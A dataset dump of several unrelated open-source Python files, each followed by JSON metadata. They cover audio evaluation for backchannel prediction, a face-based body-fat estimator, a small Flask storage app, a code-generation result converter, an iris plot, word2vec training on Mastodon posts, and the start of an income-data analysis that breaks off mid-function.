margin=want_margin)\n\n predictions = evaluate.get_predictions(config_path, convchannel, eval_conf)\n nn_bc_audio = get_bc_audio(reader, _orig_audio.size, bcs, predictions)\n nn_bc_audio = evaluate.normalize_audio(nn_bc_audio[start_inx:end_inx], maxamplitude=maxamplitudeBC)\n\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s BC=NN-{bctrack}.{fmt}\"),\n np.stack([orig_audio, nn_bc_audio], axis=1), 8000, downmix=downmix, convFmt='mp3')\n if write_orig:\n out_dir2 = join(out_dir, \"orig\")\n os.makedirs(out_dir2, exist_ok=True)\n truth_bc_audio = reader.features.get_adc(bcconvchannel)\n truth_bc_audio = evaluate.normalize_audio(truth_bc_audio[start_inx:end_inx], maxamplitude=maxamplitudeBC)\n\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s BC=Truth.{fmt}\"),\n np.stack([orig_audio, truth_bc_audio], axis=1), 8000, downmix=downmix, convFmt='mp3')\n if write_truthrandom:\n out_dir2 = join(out_dir, \"truthrandom\")\n os.makedirs(out_dir2, exist_ok=True)\n truth_predictor = [reader.getBcRealStartTime(bc) for (bc, bcInfo) in\n reader.get_backchannels(list(reader.get_utterances(bcconvchannel)))]\n truth_randomized_bc_audio = get_bc_audio(reader, _orig_audio.size, bcs, truth_predictor)\n truth_randomized_bc_audio = evaluate.normalize_audio(truth_randomized_bc_audio[start_inx:end_inx],\n maxamplitude=maxamplitudeBC)\n write_convert(join(out_dir2, 
f\"{conv}{channel} @{start:.2f}s BC=Truth-Randomized.{fmt}\"),\n np.stack([orig_audio, truth_randomized_bc_audio], axis=1), 8000, downmix=downmix,\n convFmt='mp3')\n if write_random:\n # selected / relevant from\n # evaluate/out/v050-finunified-16-g1be124b-dirty:lstm-best-features-power,pitch,ffv,word2vec_dim30-slowbatch/results.json\n # so it has same frequency as good nn result\n frequency = 1 # 8256 / 5109\n shuffle_in_talklen = True\n out_dir2 = join(out_dir, \"random\")\n os.makedirs(out_dir2, exist_ok=True)\n random_predictor = evaluate.random_predictor(reader, convchannel,\n dict(random_baseline=dict(frequency=frequency,\n shuffle_in_talklen=shuffle_in_talklen)))\n randomized_bc_audio = get_bc_audio(reader, _orig_audio.size, bcs, random_predictor)\n randomized_bc_audio = evaluate.normalize_audio(randomized_bc_audio[start_inx:end_inx],\n maxamplitude=maxamplitudeBC)\n write_convert(join(out_dir2,\n f\"{conv}{channel} @{start:.2f}s BC=Randomized-{frequency:.1f}x\"\n + f\"-{'T' if shuffle_in_talklen else 'A'}.{fmt}\"),\n np.stack([orig_audio, randomized_bc_audio], axis=1), 8000, downmix=downmix,\n convFmt='mp3')\n count += 1\n\n\n@functools.lru_cache()\ndef get_boring_bcs(config_path: str, convid: str):\n reader = loadDBReader(config_path)\n bcs = reader.get_backchannels(list(reader.get_utterances(convid)))\n l = []\n for (bc, bcInfo) in bcs:\n text = bcInfo['text'] # type: str\n if \"[laughter\" in text or \"[noise\" in text:\n continue\n filtered = reader.noise_filter(text).lower()\n if reader.bc_to_category[filtered] != 'neutral':\n continue\n l.append((bc, bcInfo))\n return l\n\n\ndef bcs_to_samples(reader: DBReader, bcs):\n for bc, bcInfo in bcs:\n adc = reader.features.get_adc(bcInfo['convid'])\n fromTime = reader.getBcRealStartTime(bc)\n from_index = adc.time_to_sample_index(fromTime)\n to_index = adc.time_to_sample_index(reader.getBcRealFirstEndTime(bc))\n audio = adc[from_index:to_index]\n if not is_pretty_silent(audio):\n yield bc, bcInfo, fromTime, audio\n\n\ndef is_pretty_silent(audio: Audio):\n pow = np.sqrt(sum(audio.astype('float32') ** 2) / len(audio))\n return pow < 500\n\n\ndef output_bc_samples(version_str, convids: List[str]):\n for convid in convids:\n out_dir = join(\"evaluate\", \"out\", version_str, \"BC\", convid)\n os.makedirs(out_dir, exist_ok=True)\n\n for i, (bc, bcInfo, bcStartOffset, audio) in enumerate(\n bcs_to_samples(reader, get_boring_bcs(config_path, convid))):\n text = bcInfo['text']\n pow = np.sqrt(sum(audio.astype('float32') ** 2) / len(audio))\n # print(f\"{conv}: {i:03d}: {pow:05.2f}\")\n print(f\"{convid}: {i}: {text}\")\n # audio = evaluate.normalize_audio(audio, maxamplitude=0.9)\n write_convert(join(out_dir, f\"{i:03d}.{fmt}\"), audio, 8000, downmix=False, convFmt=None)\n\n\ngood_bc_sample_tracks = \"sw2249-A,sw2254-A,sw2258-B,sw2297-A,sw2411-A,sw2432-A,sw2485-A,sw2606-B,sw2735-B,sw2762-A,sw4193-A\".split(\n \",\")\n# good_bc_sample_tracks = [\"sw2603-A\"]\n\n# noise leaking etc.\nbad_eval_tracks = [\"sw3536-A\", \"sw2519-B\", \"sw2854-A\", \"sw3422-A\", \"sw2163-B\", \"sw3384\", \"sw4028-B\", \"sw3662\", \"sw2073\",\n \"sw3105\", \"sw2307\", \"sw3942\", \"sw2307\", \"sw3715\", \"sw2027\", \"sw2849\", \"sw2787\", \"sw3357\", \"sw2389\"]\n# assume problems are symmetric\nbad_eval_convos = [track.split(\"-\")[0] for track in bad_eval_tracks]\n\ngood_eval_tracks = []\n\nif __name__ == '__main__':\n config_path = sys.argv[1]\n args = config_path.split(\"/\")\n version = \"None\"\n if len(args) == 4:\n _, _, version, _ = args\n\n config = 
load_config(config_path)\n reader = loadDBReader(config_path)\n conversations = read_conversations(config)\n eval_conversations = sorted(conversations['eval'])\n eval_conversations = [convo for convo in eval_conversations if convo not in bad_eval_convos]\n # valid_conversations = sorted(conversations['validate'])\n write_wavs(reader, eval_conversations, 1e10, version, good_bc_sample_tracks, write_mono=True, write_nn=True,\n write_orig=False, write_truthrandom=True, downmix=True)\n output_bc_samples(version, good_bc_sample_tracks)\n# write_wavs(reader, eval_conversations, 100000000, version, good_bc_sample_tracks,\n# )\n", "repo_name": "phiresky/backchannel-prediction", "sub_path": "evaluate/write_wavs.py", "file_name": "write_wavs.py", "file_ext": "py", "file_size_in_byte": 11552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "52", "api": [{"api_name": "extract.readDB.DBReader", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "extract.util.invert_channel", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "subprocess.call", "line_number": 47, "usage_type": "call"}, {"api_name": "extract.feature.Audio", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 49, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 50, "usage_type": "call"}, {"api_name": "extract.readDB.DBReader", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 59, "usage_type": "name"}, {"api_name": "extract.feature.Audio", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 60, "usage_type": "name"}, {"api_name": "extract.feature.Audio", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "extract.readDB.DBReader", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 75, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 94, "usage_type": "call"}, {"api_name": "extract.util.invert_channel", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, 
"usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 166, "usage_type": "call"}, {"api_name": "extract.readDB.loadDBReader", "line_number": 173, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 171, "usage_type": "call"}, {"api_name": "extract.readDB.DBReader", "line_number": 187, "usage_type": "name"}, {"api_name": "extract.feature.Audio", "line_number": 198, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 199, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 203, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 231, "usage_type": "attribute"}, {"api_name": "extract.util.load_config", "line_number": 237, "usage_type": "call"}, {"api_name": "extract.readDB.loadDBReader", "line_number": 238, "usage_type": "call"}, {"api_name": "extract.readDB.read_conversations", "line_number": 239, "usage_type": "call"}]} +{"seq_id": "71424286246", "text": "import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom keras.layers import Input, Dense, Dropout, Flatten, Conv2D, MaxPooling2D, BatchNormalization, LeakyReLU\nimport pandas as pd\nimport cv2\nimport os\nimport subprocess\n\nfor (root,dirs,files) in os.walk(os.getcwd(), topdown=True):\n if 'model.h5' not in files:\n subprocess.run([\"gdown\", \"1VdNkNtdlyr6MK-Fox94bqyrBO50vhTlo\"]) \n else:\n print('found model.h5')\n if 'model2.h5' not in files:\n subprocess.run([\"gdown\",\"1ndsctNnxGWYUT26nQ8xsa_6mshBZ9xrV\"])\n else:\n print('found model2.h5')\n break\nmodel = tf.keras.models.load_model(\"model.h5\") #For BMI prediction\nmodel2 = tf.keras.models.load_model(\"model2.h5\") #For Age prediction\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n \ndef predictBodyFat(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE)\n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n face_frame = cv2.resize(image[x:x+h,y:y+h,:], (224, 224))\n \n \n face_frame = face_frame.reshape(1,224,224,3)\n bmi = model.predict(face_frame)[0][0]\n age = model2.predict(face_frame)[0][0]\n body_fat = 1.2*bmi + 0.23*age - 5.4\n\n return body_fat\n\n", "repo_name": "abhinavr11/engage22", "sub_path": "hosting/bodyFat/helperBodyFat.py", "file_name": "helperBodyFat.py", "file_ext": "py", "file_size_in_byte": 1586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", 
"line_number": 12, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.CascadeClassifier", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "10855622630", "text": "#!/usr/bin/python\nfrom kyotocabinet import *\nfrom datetime import datetime\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash, _app_ctx_stack, config, views\nfrom flask.ext.wtf import Form, TextAreaField, TextField, validators, ValidationError\nimport json, re\n\nclass Config():\n DB = \"bucket.kct\"\n LENS_STOR = \"lens.kch\"\n DEBUG = True\n SECRET_KEY = 'development key'\n USERNAME = 'admin'\n PASSWORD = 'default'\n\napp = Flask(__name__)\napp.config.from_object('lifebucket.Config')\n#app.config.from_envvar('LIFEBUCKET_CONFIG')\n\n# \"Constants\"\nOK = u'success'\nNO = u'failure'\nclass Insert(Form):\n value = TextAreaField('Value', validators=[validators.Required()])\n\ndef lensCheck(form, field):\n pass\n\nclass View(Form):\n lens = TextField('Lens', validators=[validators.Required(), lensCheck])\n\nclass Lens(views.MethodView):\n def get(self, lens_id):\n with app.app_context():\n db = get_lens()\n if lens_id is None:\n return json.dumps([ [ int(lens_id), db[lens_id] ] for lens_id in db ])\n else:\n return json.dumps([ int(lens_id), db[lens_id] ])\n\n def post(self):\n with app.app_context():\n if len(re.split(';', request.form.get('lens', ''))) == 3:\n db = get_lens()\n new_key=db.get('avail') or 0\n db.set(new_key, request.form.get('lens', ''))\n db.set('avail', int(new_key)+1)\n return json.dumps({'status':OK, 'lens':new_key})\n else:\n return json.dumps({'status':NO, 'info':request.form.get('lens', '')})\n\n def delete(self, lens_id):\n with app.app_context():\n db = get_lens()\n if db.remove(lens_id):\n return json.dumps({'status':OK, 'lens': lens_id})\n else:\n return json.dumps({'status':NO, 'error': 'No such lens_id'})\n\n def put(self, lens_id):\n with app.app_context():\n db = get_lens()\n if db.replace(lens_id, request.form.get('lens', '')):\n return json.dumps({'status': OK})\n else:\n return json.dumps({'status':NO, 'error': 'No such lens_id'})\n\n# steal some flask docs code\nlens_view = Lens.as_view('lens_api')\napp.add_url_rule('/lens/', defaults={'lens_id': None}, view_func=lens_view, methods=['GET',])\napp.add_url_rule('/lens/', view_func=lens_view, methods=['POST',])\napp.add_url_rule('/lens/<int:lens_id>', view_func=lens_view, methods=['GET', 'PUT', 'DELETE'])\n\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n top = _app_ctx_stack.top\n if not hasattr(top, 'db'):\n top.db = DB()\n top.db.open(app.config['DB'], DB.OWRITER | 
DB.OCREATE)\n return top.db\n\ndef get_lens():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n top = _app_ctx_stack.top\n if not hasattr(top, 'lens'):\n top.lens = DB()\n top.lens.open(app.config['LENS_STOR'], DB.OWRITER | DB.OCREATE)\n return top.lens\n\n@app.route('/')\ndef index():\n form = Insert()\n if form.validate_on_submit():\n flash(\"Success\")\n return redirect(url_for(\"index\"))\n return render_template('index.html', form=form)\n\n#@app.route('/lens')\n#def lens_input():\n# form = View()\n# if form.validate_on_submit():\n# flash(\"Success\")\n# return redirect(url_for(\"output\"))\n# return render_template('lens_input.html', form=form)\n\n@app.route('/settings')\ndef settings():\n return render_template('settings.html')\n\n@app.route('/license')\ndef copyright():\n return render_template('copyright.html')\n\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n@app.route('/api/value', methods=(\"POST\", \"PUT\"))\ndef post_value():\n with app.app_context():\n db = get_db()\n db.set(datetime.utcnow(), json.dumps(request.args.to_dict()['value']))\n db.commit()\n return jsonify(status=OK)\n return jsonify(status=NO)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "hdonnay/lifebucket", "sub_path": "lifebucket.py", "file_name": "lifebucket.py", "file_ext": "py", "file_size_in_byte": 4149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.ext.wtf.Form", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.ext.wtf.TextAreaField", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators.Required", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.ext.wtf.Form", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.ext.wtf.TextField", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators.Required", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.ext.wtf.validators", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.views.MethodView", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.views", "line_number": 32, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "re.split", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, 
{"api_name": "json.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 66, "usage_type": "call"}, {"api_name": "flask._app_ctx_stack.top", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask._app_ctx_stack", "line_number": 79, "usage_type": "name"}, {"api_name": "flask._app_ctx_stack.top", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask._app_ctx_stack", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.request.args.to_dict", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 127, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "42240659807", "text": "import os\r\nfrom evaluate import ConalaEval\r\nimport json \r\nimport util\r\n\r\nBASE_DIR = os.path.join( os.path.dirname( __file__ ), '..' 
)\r\n\r\ndef convert_to_competition_format(path, from_name): \r\n with open(BASE_DIR + '/' + path + '/' + from_name, 'r', encoding='UTF-8') as f:\r\n model_results = f.readlines()\r\n \r\n # Building JSON txt format in a brute - force way\r\n with open(BASE_DIR + '/' + path + '/answer.txt', 'w', encoding='utf-8') as outfile:\r\n outfile.writelines('[')\r\n outfile.write('\\n')\r\n for idx, line in enumerate(model_results):\r\n line_decoded = util.encoded_code_tokens_to_code_sl(line.split())\r\n outfile.write('\\\"' + str(line_decoded).replace('\\n', '\\\\n').replace('\"', '') + '\\\"')\r\n if idx != len(model_results) - 1:\r\n outfile.write(',')\r\n outfile.write('\\n')\r\n outfile.writelines(']')\r\n \r\n with open(BASE_DIR + '/' + path + '/answer.txt', \"r\") as f:\r\n data = json.load(f)\r\n print(data)\r\n #with open(BASE_DIR + '/' + 'results/lstm-attention/answer.txt', 'w', encoding='utf-8') as \r\n\r\nif __name__ == \"__main__\":\r\n # **************** lstm **********************\r\n #convert_to_competition_format('results/lstm-attention', 'attention_test_results')\r\n # **************** transformers **************\r\n convert_to_competition_format('results/transformers', 'transformers_test_results_17.39')", "repo_name": "roslan22/FromNaturalLanguageToCode", "sub_path": "eval/convert_to_competition_json.py", "file_name": "convert_to_competition_json.py", "file_ext": "py", "file_size_in_byte": 1441, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "util.encoded_code_tokens_to_code_sl", "line_number": 17, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "15522129807", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n# fig = plt.figure()\n# ax = fig.add_subplot(3, 3, 1)\n# ax2 = fig.add_subplot(3, 3, 2)\n# rect = plt.Rectangle((0.2, 0.75), 0.4, 0.15, color='r', alpha=0.3)\n# circ = plt.Circle((0.7, 0.2),0.15, color='b', alpha=0.3)\n# ax.add_patch(rect)\n# ax2.add_patch(circ)\n# plt.show()\n\n# -----------------------------\n# a = np.arange(10)\n# print(a)\n#\n# plt.xlabel('X')\n# plt.ylabel('Y')\n# plt.plot(a, a * 1.5, a, a * 2.5, a, a * 3.5, a, a * 4.5)\n# plt.legend(['1.5x', '2.5x', '3.5x', '4.5x'])\n# plt.show()\n# -----------------------------\n\n# x = np.linspace(-10, 10, 100)\n# print(x)\n# y = np.sin(x)\n# print(y)\n# plt.plot(x, y, marker=\"o\")\n# plt.show()\n# -----------------------------\ndf = pd.read_csv('../datas/iris.csv', header=None)\nX = df.iloc[:, [0, 2]].values\n# print(X)\n\nplt.scatter(X[:50, 0], X[:50, 1], color='red', marker='o', label='setosa')\nplt.scatter(X[50:100, 0], X[50:100, 1], color='blue', marker='x', label='versicolor')\nplt.scatter(X[100:, 0], X[100:, 1], color='green', marker='+', label='Virginica')\nplt.xlabel('Sepal.Length')\nplt.ylabel('Sepal.Width')\nplt.legend(loc=2)\nplt.show()\n", "repo_name": "changesmile/Machine", "sub_path": "机器学习/3章/花鸟.py", "file_name": "花鸟.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 36, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "11081020512", "text": "import multiprocessing as mp\nimport re\nimport time\nfrom pathlib import Path\n\nimport gensim\nimport MeCab\n\n\ndef get_file_path():\n \"\"\"\n 固有名詞のdfのpathのリスト\n \"\"\"\n p = Path(__file__).parent.resolve() / \"..\" / \"toots_log\"\n file_paths = sorted([f for f in p.iterdir() if f.is_file()])\n return file_paths\n\n\ndef read_files(file_paths):\n text = \"\"\n for file_path in file_paths:\n with open(file_path, \"r\") as f:\n text += f.read()\n text += \"\\n\"\n text = re.sub(r\":[a-zA-Z0-9_-]+:\", \"\", text)\n text = re.sub(\" \", \"\\n\", text)\n return text\n\n\ndef wakachi(text):\n # corpus = [[word,word,word],[word,word,word,word],,,]\n m = MeCab.Tagger(\"-d /usr/lib/mecab/dic/mecab-ipadic-neologd\")\n corpus = [\n [word.split(\"\\t\")[0] for word in m.parse(sentence).splitlines() if word != \"EOS\"]\n for sentence in text.splitlines()\n ]\n return corpus\n\n\nif __name__ == \"__main__\":\n file_paths = get_file_path()\n print(len(file_paths))\n text = read_files(file_paths)\n print(\"corpus作成\")\n corpus = wakachi(text)\n print(len(corpus))\n print(\"学習始め\")\n model = gensim.models.word2vec.Word2Vec(\n corpus, size=60, window=8, min_count=5, workers=mp.cpu_count(), sg=1, iter=6\n )\n print(\"学習終了, 保存\")\n print(\"vocab: {}語\".format(len(model.wv.vocab)))\n model.save(str(Path(__file__).parent.resolve() / \"word2vec.gensim.model\"))\n print(\"---保存完了---\")\n", "repo_name": "kelvin27315/mastodon-wordcloud", "sub_path": "src/w2v/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 25, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 26, "usage_type": "call"}, {"api_name": "MeCab.Tagger", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.models.word2vec.Word2Vec", "line_number": 48, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 48, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 49, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "19323298957", "text": "import pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as ppt\r\nimport numpy as np\r\nimport copy\r\n\r\nfrom sklearn import preprocessing\r\nfrom 
sklearn.model_selection import train_test_split\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import metrics\r\n\r\n\r\nclass Constants:\r\n MAX_NUMBER_OF_SUBPLOTS = 5\r\n GENDER = {'Female': 1, 'Male': 2}\r\n\r\n\r\ndef unknownCount(data: pd.DataFrame) -> dict:\r\n unknown = dict()\r\n for column in data:\r\n unknown[column] = data[data[column] == '?'].shape[0]\r\n return unknown\r\n\r\n\r\ndef clearData(data: pd.DataFrame):\r\n data['income'] = data['income'].apply(lambda value: int(value == '>50K'))\r\n data.replace('?', np.NaN)\r\n\r\ndef analyzeIncomeByEducationAndHoursPerWeek(data: pd.DataFrame):\r\n income_data = data.groupby(['education', 'hours-per-week'])['income'].mean().to_frame()\r\n income_data['income'] = income_data['income'] * 100 # convert to percents\r\n income_data = income_data.reset_index(level=[0, 1])\r\n educations = income_data['education'].unique()\r\n educations_number = educations.shape[0]\r\n offset = 0\r\n if educations_number > Constants.MAX_NUMBER_OF_SUBPLOTS:\r\n while educations_number != 0:\r\n subplots_number = min(educations_number, Constants.MAX_NUMBER_OF_SUBPLOTS)\r\n createEducationData(income_data, educations, subplots_number, offset)\r\n offset += subplots_number\r\n educations_number -= subplots_number\r\n else:\r\n createEducationData(income_data, educations, educations_number, 0)\r\n\r\n\r\ndef createEducationData(income_data, educations, subplots_number, subplots_offset):\r\n _, axes = ppt.subplots(subplots_number, constrained_layout=True)\r\n education_offset = 0\r\n index = 0\r\n for value in educations:\r\n if index == subplots_number:\r\n break\r\n\r\n if education_offset < subplots_offset:\r\n education_offset += 1\r\n continue\r\n\r\n education_data = income_data[income_data['education'] == value]\r\n if subplots_number == 1:\r\n createSingleGraph(axes,\r\n education_data['hours-per-week'],\r\n education_data['income'],\r\n 'hours-per-week',\r\n 'normalized income',\r\n value)\r\n break\r\n\r\n createSingleGraph(axes[index],\r\n education_data['hours-per-week'],\r\n education_data['income'],\r\n 'hours-per-week',\r\n 'normalized income',\r\n value)\r\n index += 1\r\n ppt.show()\r\n\r\n\r\ndef analyzeIncomeByGender(data: pd.DataFrame):\r\n income_data = data.groupby('gender')['income'].mean().to_frame()\r\n income_data['income'] = income_data['income'] * 100\r\n bins = ['Female', 'Male']\r\n values = [income_data.loc['Female', 'income'], income_data.loc['Male', 'income']]\r\n ppt.bar(bins, values)\r\n ppt.title(\"Income by gender\")\r\n 